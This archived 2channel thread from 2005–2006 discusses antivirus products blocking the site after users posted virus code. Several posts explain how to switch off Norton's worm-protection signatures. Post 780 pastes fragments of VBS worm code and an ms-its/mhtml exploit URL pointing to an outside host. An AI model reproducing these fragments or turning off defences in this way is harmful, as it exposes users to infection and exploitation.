0001動け動けウゴウゴ2ちゃんねる
2005/11/28(月) 16:08:40ID:bR9gbCGm0アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
探検
ノートン誤作動対策本部
■ このスレッドは過去ログ倉庫に格納されています
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
0700動け動けウゴウゴ2ちゃんねる
2006/03/22(水) 08:46:20ID:wpuXyhSJ0まあふつうの板ならそれで十分だね。
実況系に貼られるとアレだけど。
0701動け動けウゴウゴ2ちゃんねる
2006/03/22(水) 13:50:33ID:Jh7u58QW0NAVで困ってる人にマジオススメ。
0702動け動けウゴウゴ2ちゃんねる
2006/03/22(水) 17:43:28ID:w4BbNhMT0間違ってたらツッコミよろ。
○NAVを使っていて"このコンピュータに対する侵入 「HTTP MSIE JavaScript OnLoad
Rte CodeExec」 の試みを検出して遮断しました。"というメッセージが出て、
2chに30分間アクセスできなくなった時の対処方法(とりあえず)
1.NAVのオプション→インターネットワーム防止→「除外の設定」で、
「HTTP MSIE JavaScript OnLoad Rte CodeExec」のチェックをはずす
2.「AutoBlockルール」で、2chへの遮断を解除
3.スレを開いてログを取得する
4.専用ブラウザのあぼ〜ん設定で、NGWORDなどを使って、当該レスを表示しないようにする
5.手順1ではずした「除外の設定」のチェックを元に戻しておくのを忘れない
0703動け動けウゴウゴ2ちゃんねる
2006/03/22(水) 19:04:03ID:ymCvr6qY00704動け動けウゴウゴ2ちゃんねる
2006/03/23(木) 04:48:52ID:knzg2z2B0ついでにウイルスコードもまとめてあぼ〜ん指定したら
NGワードファイルがノートン先生に吹っ飛ばされますた。
俺バカス(´・ω・`)
0705動け動けウゴウゴ2ちゃんねる
2006/03/23(木) 13:53:00ID:anluZr4600706ああああああああああああ
2006/03/23(木) 14:13:34ID:8snwN8ut0キタ━━ <body onload=window()> ━━━ !!
0707動け動けウゴウゴ2ちゃんねる
2006/03/23(木) 17:03:54ID:YEG4wxWs0だから貼るなっちゅうに
0708動け動けウゴウゴ2ちゃんねる
2006/03/23(木) 20:56:17ID:yEL+otgn00709動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 03:21:19ID:UTBvDXUa00710動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 07:14:40ID:i9GBvAYP00711動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 08:46:06ID:vILNut4O0読み込んでからNGワードかどうか判断するから意味ないと思われ。
0712動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 09:07:22ID:i9GBvAYP0だよねえ。
上の方に「あぼ〜んで対処できた」って書いてあったから試してみたけど、
通信の時点で遮断しちゃうんだからローカルあぼ〜んじゃ
どうにもならないよね。
0713動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 09:18:19ID:sLk1Hgj900714動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 11:56:58ID:wt38hkxO0もちろん初回はダメね。
0715動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 14:04:40ID:EI6FM7wb00716動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 14:16:06ID:xwm6rnKy0ホットゾヌ2です。
0717動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 18:05:08ID:tQr3xHLo00718動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 18:10:05ID:y5S9pPbQ0ノートンが2度発動。しかも最新50で
0719動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 19:23:19ID:bPqztrik0ですね。
実際あぼーんしてなくても、いったん取得すれば問題ないし。
0720動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 21:22:57ID:hZPlzV+H0今まで特に問題も無かったが最近エクセル開こうとしたら
「ウイルスチェックを開始します…」といって全く開けなくなった。
コレはどういうことなんですかね?解決策とかありますか?
0721動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 21:27:39ID:r6Vhzw/P00722動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 22:36:58ID:yqAK9A//00723動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 22:40:08ID:AY5Wzasy02ch絡みでない誤作動の面倒を見るスレではありません
エクセルでの誤作動報告は当局に対して行ってください
0724動け動けウゴウゴ2ちゃんねる
2006/03/24(金) 22:49:05ID:98Y674mT0それ以外は門前払いされるのは当然
0725動け動けウゴウゴ2ちゃんねる
2006/03/26(日) 00:52:32ID:XWLKIRWU0しょうがなくAutoBlock見て解除してる
0726動け動けウゴウゴ2ちゃんねる
2006/03/26(日) 15:57:37ID:BZxZKTBW0そうなんだよ、それが見つからなくて困ってここに来たよ。
0727動け動けウゴウゴ2ちゃんねる
2006/03/26(日) 16:24:59ID:pwaEyKGo0参考までに・・・ただし、自己責任で
ノートンアンチウイルス2006 Ver.1
http://pc8.2ch.net/test/read.cgi/sec/1129452372/996
> まず、オプション→インターネット→インターネットワーム防止→除外の設定で、
> HTTP MSIE JavaScript OnLoad Rte CodeExecのチェックを外す。
> そのあと、オプション→インターネット→インターネットワーム防止→
> AutoBlockルール→現在、AutoBlockで遮断しているコンピュータで、
> 遮断解除してok。で、ok。
0728動け動けウゴウゴ2ちゃんねる
2006/03/26(日) 16:48:28ID:UrgZmqGG0おお、ありがとうございます。見れました。
うち2005なのに今日から突然誤作動が始まった・・・なんなんだ。
0729cen ◆Am9xOgNMYE
2006/03/26(日) 17:19:42ID:Y3ON9q4k01.スレッドを見ると
「「HTTP MSIE Java Script OnLoad Ret CodeExec」の試みを検出して遮断しました。」
という反応をする。
2.Norton AntiVirusのオプションを開いて、インターネットワーム防止を選択、
AutoBlockルールのリストから先程のIPアドレスを消して、閉じる。
インターネットワーム防止をオンにするのチェックを外して無効にする。
3.スレッドを再取得
4.http://www.geocities.jp/cen_hp/program3.html を使って無効化
5.インターネットワーム防止をオンにするのチェックをして有効にする。
0730動け動けウゴウゴ2ちゃんねる
2006/03/26(日) 19:08:48ID:40HZ683F0ν速だけ繋がらないから鯖落ちしてんのかと思った
おかげで助かりました
ありがとう
0731動け動けウゴウゴ2ちゃんねる
2006/03/26(日) 19:27:00ID:iC6tWHU/0うっとうしくってしかたない。
0732動け動けウゴウゴ2ちゃんねる
2006/03/26(日) 19:27:45ID:Y7phTP2S00733動け動けウゴウゴ2ちゃんねる
2006/03/26(日) 19:38:27ID:btlK6zh50>>167
まあこの2人がこう発言しているから、やらないでしょう。
0734動け動けウゴウゴ2ちゃんねる
2006/03/26(日) 19:58:57ID:/R1Hc6p700735動け動けウゴウゴ2ちゃんねる
2006/03/26(日) 20:08:42ID:/R1Hc6p700736動け動けウゴウゴ2ちゃんねる
2006/03/26(日) 20:11:55ID:/R1Hc6p700737動け動けウゴウゴ2ちゃんねる
2006/03/26(日) 23:58:19ID:Rds5NGK800738動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 00:57:22ID:3I+bmZi80それで無差別にコード貼りまくられたら流石に2ちゃんも対応するだろ。
分からない人の苦情が殺到して対応に追われるから。
>>167は危機感足りないんじゃ?
0739動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 01:02:58ID:AmYXUlqp02ch側の対応、どっちが早いかな。
0740動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 01:21:18ID:NmoRfDPm0今更危機感足りないとか対応とか望んでも無駄でしょう。
無差別に爆撃ってことなら、コード貼り付け関係なくその爆撃自体は対応するでしょうけどね。
0741動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 01:21:46ID:e6NTu7TL0今までの対応の仕方をみていて、単なる野次馬の予想ですが。
>適当な文字を貼り付けるウイルス?あるじゃん
これは対応すると思うが(現に今もやっている)
>それで無差別にコード貼りまくられたら流石に2ちゃんも対応するだろ。
>分からない人の苦情が殺到して対応に追われるから
こっちは対応いないんじゃないかな?
現に苦情が殺到中のコメントが>>167だった訳だし。
ノートンを切るか、2chに来ないかと言う答えになると思うよ。
0742動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 02:08:38ID:CRZkjnUj0シェアをトレンドマイクロに奪われたりすればシマンテックも誤作動対策に着手するかもしれないが
ユーザーに対策を押し付けるような商売してたら淘汰されるのも仕方ないと思う
0743動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 03:02:31ID:stSyB+tW00744動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 07:09:30ID:GKKli8mx00745sage
2006/03/27(月) 07:24:02ID:8a4Se6FG0出会い系⇔ニューリンク
0746動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 10:02:20ID:7R1vXd2PO0747動け動けウゴウゴ2ちゃんねる
NGNGエンジンを書き換えるとなると本社の対応が必要なわけで、
「ある一つの掲示板が見られなくなる」ということの重要性が
あっちに伝わらないんだろうと思われ。
1000万人のネットユーザから不買運動されたらさすがに考えると
思うけど、そういう組織だった動きにもなっていないし。
もっとも、Antinny亜種の対応に追われている状況では
2ちゃんに対してあまり好意的にはなれないことも考えられるが。
0748外野ァァン
2006/03/27(月) 12:45:20ID:/XC2wMgb0> 2ちゃんに対してあまり好意的にはなれないことも考えられるが。
ウィルスがあってこそのアンチウィルスソフトだから、
新種ウィルスの発現はむしろ喜ばしく思ってたりするんじゃないスかね
0749動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 12:49:35ID:rmERapPS0仕様変更しない限り対応はしないんじゃねえかなぁ
それともユーザーが束になって苦情入れたら対応するのかな?
0750外野ァァン
2006/03/27(月) 12:50:05ID:/XC2wMgb0もしくは恋の予感
ごめん
0751動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 15:27:25ID:Jk15jv3kOこれだけで日本での売り上げが伸びるのにな
0752名無しの洞窟 ◆A8o1Gm.EXE
2006/03/27(月) 15:36:27ID:SAfGa+FD0切に願う
ttp://dictionary.www.infoseek.co.jp/?sv=KO&qt=%C0%DA%A4%CB&sm=1&lp=0&se=on&gr=ml
>>752
言いだしっぺの(ry
ってラブレターなのかいw
http://pc7.2ch.net/test/read.cgi/pcqa/1109609938/365
無しの礫・・・
ソース入れたから撥ねられているんだろなぁ〜
Monazilla/1.00 (JaneView/0.1.12.1)
0754動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 16:34:49ID:6NuGU2zF02002のころから、正規ユーザーとしてバージョンアップごとに
シマンテックにはご注進してきたのに、ラブレター文字列すら対応しないんだもの。
今回も、ワーム防止に自分ルール追加しろ、って返事だったよ。
(2chのサーバIPアドレスを信頼するように設定して回避しろと)
0755動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 16:58:55ID:vVYOuf/i0この文を3〜10ヵ所に貼り付け、回してくださいw
これをやった貴方は絶対に夢や学校一のモテ仔に
なりますw
やんなかったら不幸が突撃します
もうココまで読んでしまった人は最低3ヵ所は回さないと絶対不幸が100%突撃して死亡するでしょう
この画像は最低3ヵ所回してから見てください
こちら
3〜10ヵ所って事は3箇所以上だったらなんでもいんですよっ!
やればやるほどし・あ・わ・せ!
これやった人は実際に
両思いになれたり、
学校一のモテ仔になれたり、
夢が叶ったり
欲しい物が手に入ったり。
一気に幸せが手に入ります
だから移せば移すほどお得!
成功した人の名前↓
山田三春
中野 純
その他にもたっくさん叶った人が居ます
だから回してね失敗した人なんて居ません
0756動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 21:38:34ID:hQ0Nj+JU0にある対処方法(2chサーバのIPアドレスを除外する)はNISだけなんで、
NAV2005でそれらしい箇所探した。
「オプション」→「インターネットワーム防止」→「一般ルール」→「Default Non-Routable IPs」を「修正」→「処理」タブで「許可」→「コンピュータ」タブの「下のリストにあるコンピュータとサイトのみ」で「追加」→「個別」
のとこにコピペでいいと思う。右クリックで貼り付けがきかなかったので、Ctrl+Vでやった。
0757動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 22:31:53ID:hM5eTmkR0遮断されるスレ開いても(ログも削除した)何も起きないんだけど
0758動け動けウゴウゴ2ちゃんねる
2006/03/27(月) 22:33:03ID:JGQYg4X+00759動け動けウゴウゴ2ちゃんねる
2006/03/28(火) 00:02:18ID:P/63CUXR00760動け動けウゴウゴ2ちゃんねる
2006/03/28(火) 21:07:54ID:TP3z61ts0LiveUpdateしても、このスレを再所得すると反応するよ。
対応されていないのでは?
0761動け動けウゴウゴ2ちゃんねる
2006/03/30(木) 19:46:50ID:+bc29xxf02ちゃんから攻撃されたので遮断しますたって
なんとか解除したけど
0762動け動けウゴウゴ2ちゃんねる
2006/03/31(金) 22:00:47ID:97YYo5Zc0タスクマネージャ見てもどれがどれだかさっぱり・・・。
0763動け動けウゴウゴ2ちゃんねる
2006/03/31(金) 23:28:25ID:tb37pHfX0セキュリティ板のノートンスレとかシマンテックに聞け
0764動け動けウゴウゴ2ちゃんねる
2006/04/02(日) 01:06:00ID:m1WDj/aW0http://tmp6.2ch.net/test/read.cgi/download/1142734610/
ここの2にAVGが反応するんですが
反応しないようにするにはどうしたらいいんですかね?
0765動け動けウゴウゴ2ちゃんねる
NGNGていうかうちもAVGだか、なんともないけどな?
0766動け動けウゴウゴ2ちゃんねる
2006/04/02(日) 03:11:11ID:DYw3aOAd0こっちがだめだ。875までは大丈夫だったんだけど
http://tmp6.2ch.net/test/read.cgi/download/1143304561/
0767動け動けウゴウゴ2ちゃんねる
2006/04/02(日) 16:52:52ID:8hEAiEMl0まぁセキュリティ板行けって話だけど、AVGは有償のPro版でないと除外指定ができない。
0768動け動けウゴウゴ2ちゃんねる
2006/04/02(日) 16:55:22ID:YJTVT3eF00769動け動けウゴウゴ2ちゃんねる
2006/04/02(日) 16:56:11ID:YJTVT3eF00770動け動けウゴウゴ2ちゃんねる
2006/04/02(日) 18:17:31ID:LqxABCFV0NIS入れてないし侵入検知って項目も無いのに…て思ってたらNAVでも反応するのか。
ここまで読むの大変だったけどためになったわ有り難う
0771動け動けウゴウゴ2ちゃんねる
2006/04/05(水) 06:28:02ID:L6X4AuEx0該当datが抹殺されたあげくネットアクセスが遮断されてしまう… orz
【領事館員自殺】中国側、機密を執拗に要求…総領事あての遺書入手(読売新聞)★2
ttp://news19.2ch.net/test/read.cgi/newsplus/1143894478/l50
…時々こういう事が起こるのだが、その都度運営板の
どこぞかの該当スレに通報した方がイイのかしらん?
0772動け動けウゴウゴ2ちゃんねる
2006/04/05(水) 07:24:50ID:IemTuPtY0マカフィーも反応するんだ。そこの9スレ目で。
0773動け動けウゴウゴ2ちゃんねる
2006/04/05(水) 07:31:20ID:q7ZYjZaA0とりあえず製品の不具合(ウィルスじゃないものに反応する)はマカフィーに通報でいい
0774動け動けウゴウゴ2ちゃんねる
NGNGマカフィーを窓から投げ捨てろ。
さもなきゃ自分の頭を窓から投げ捨てろ。
0775動け動けウゴウゴ2ちゃんねる
2006/04/05(水) 07:44:55ID:IemTuPtY0いやNIS2005だけどもうすぐ切れるからマカフィーにしようかなと。
0776動け動けウゴウゴ2ちゃんねる
2006/04/05(水) 22:06:28ID:vTdsxxJa0漏れのノートン先生は無反応になったぜ。
専ブラ使っていれば、な。
0777動け動けウゴウゴ2ちゃんねる
2006/04/06(木) 15:48:38ID:ogl3bSVi0インターネットワーム防止で
ナニをシグネチャ除外すれば良いんだ?
0778動け動けウゴウゴ2ちゃんねる
2006/04/06(木) 20:22:55ID:A4GZFMjG0>>727
0779動け動けウゴウゴ2ちゃんねる
2006/04/06(木) 20:34:03ID:ogl3bSVi0THX
HTTP MSIE JavaScript OnLoad Rte CodeExec
って 「MS IE」と別のとこにあるのな…ないよーと思って困ってました。
0780動け動けウゴウゴ2ちゃんねる
2006/04/07(金) 10:26:14ID:9BaGKlIFOc.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<body onload=window()>
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WC
0781動け動けウゴウゴ2ちゃんねる
2006/04/07(金) 10:34:49ID:7L7IH86h0で?
0782ノtasukeruyo
NGNG伝書鳩
0783動け動けウゴウゴ2ちゃんねる
2006/04/07(金) 23:59:38ID:B6Wm8s4l00784動け動けウゴウゴ2ちゃんねる
2006/04/08(土) 05:07:05ID:yUO2NZXw00785動け動けウゴウゴ2ちゃんねる
2006/04/08(土) 14:52:00ID:0n8hZvPv0専ブラのあぼーんよりも先にノートンがdatに反応するようになったのが原因ぽい
0786動け動けウゴウゴ2ちゃんねる
2006/04/08(土) 18:22:00ID:3ZuAlp6E00787動け動けウゴウゴ2ちゃんねる
2006/04/08(土) 19:33:27ID:Dfxh+7wv00788動け動けウゴウゴ2ちゃんねる
2006/04/09(日) 08:35:16ID:qBdtQITt0あぼーんワードはどれですか?
今はNISを無効にしてカキコしています。
0789動け動けウゴウゴ2ちゃんねる
2006/04/09(日) 09:57:32ID:vW718YJi00790動け動けウゴウゴ2ちゃんねる
2006/04/10(月) 18:40:26ID:6ukEWzx+00791動け動けウゴウゴ2ちゃんねる
2006/04/10(月) 19:43:50ID:L1pXQnpL00792788
2006/04/10(月) 23:20:01ID:2y1G/tIP0>>512
>>517
これらはすべてアボーソしてあります。
NISの設定も変えていませんでした。
>>780-785あたりでJaneDoeStyle223がおかしくなりました。
他スレでは何ともありません。
で、あれからは、ログを取得し直しただけですが、無問題になりました。
いったい何だったんだろう。
ログが壊れただけだったのかな…。
0793動け動けウゴウゴ2ちゃんねる
2006/04/12(水) 15:42:54ID:ch5Pl/k40先生よりアグレッシブだな
0794動け動けウゴウゴ2ちゃんねる
2006/04/12(水) 16:23:57ID:QTtuslSa0ウィルスバスター蛾壊れた
http://live22x.2ch.net/test/read.cgi/news/1144822966/
0795動け動けウゴウゴ2ちゃんねる
2006/04/12(水) 16:47:09ID:xZWLgV830そしてもう対応
0796名無しの洞窟 ◆A8o1Gm.EXE
2006/04/12(水) 17:28:00ID:5RaY6XDD00797動け動けウゴウゴ2ちゃんねる
2006/04/12(水) 18:58:07ID:1TPqXXUv0アップデートとアップロードを間違えるのはここだけにしておけ。
0798名無しの洞窟 ◆A8o1Gm.EXE
2006/04/12(水) 20:31:16ID:5RaY6XDD00799動け動けウゴウゴ2ちゃんねる
2006/04/13(木) 15:14:15ID:2EZeuwQo0また誰かがウィルスコード貼ったのか…(泣
馬鹿フィーが大激怒 orz
■ このスレッドは過去ログ倉庫に格納されています
ニュース
- 【速報】衆院3補選 いずれも立民候補が当選確実 自民議席失う ★9 [Hitzeschleier★]
- 維新・馬場代表「まだまだ関西以外の小選挙区で勝つことは厳しい」 ★2 [蚤の市★]
- 【ドジャース】大谷翔平、同点機に凡退でド軍連勝6でストップ 本拠地ならHRの大飛球も…得点圏打率.176 [フォーエバー★]
- 小池都知事、姿見せず 衆院補選 [どどん★]
- 外国人労働者受け入れ「賛成」62%、高齢層で大幅増 朝日世論調査 ★3 [蚤の市★]
- 衆院東京15区 次点は須藤元気氏 乙武洋匡氏は5番目の得票に終わる 酒井菜摘氏は2万票差の圧勝 [フォーエバー★]
- ちゅ、かわいくて
- 新築ジャップの戸建て、ちょっと揺れただけで一瞬で崩壊wwwwwwwwwwwwwww [542840565]
- 自民幹部「乙武さんがここまで人気がないのは想定外だった」 [786835273]
- 立憲民主党の泉健太代表、評価が爆上がりする [932029429]
- 布袋寅泰の曲ってカラオケで歌っても大丈夫?
- M性感行ってみて絵ええええええ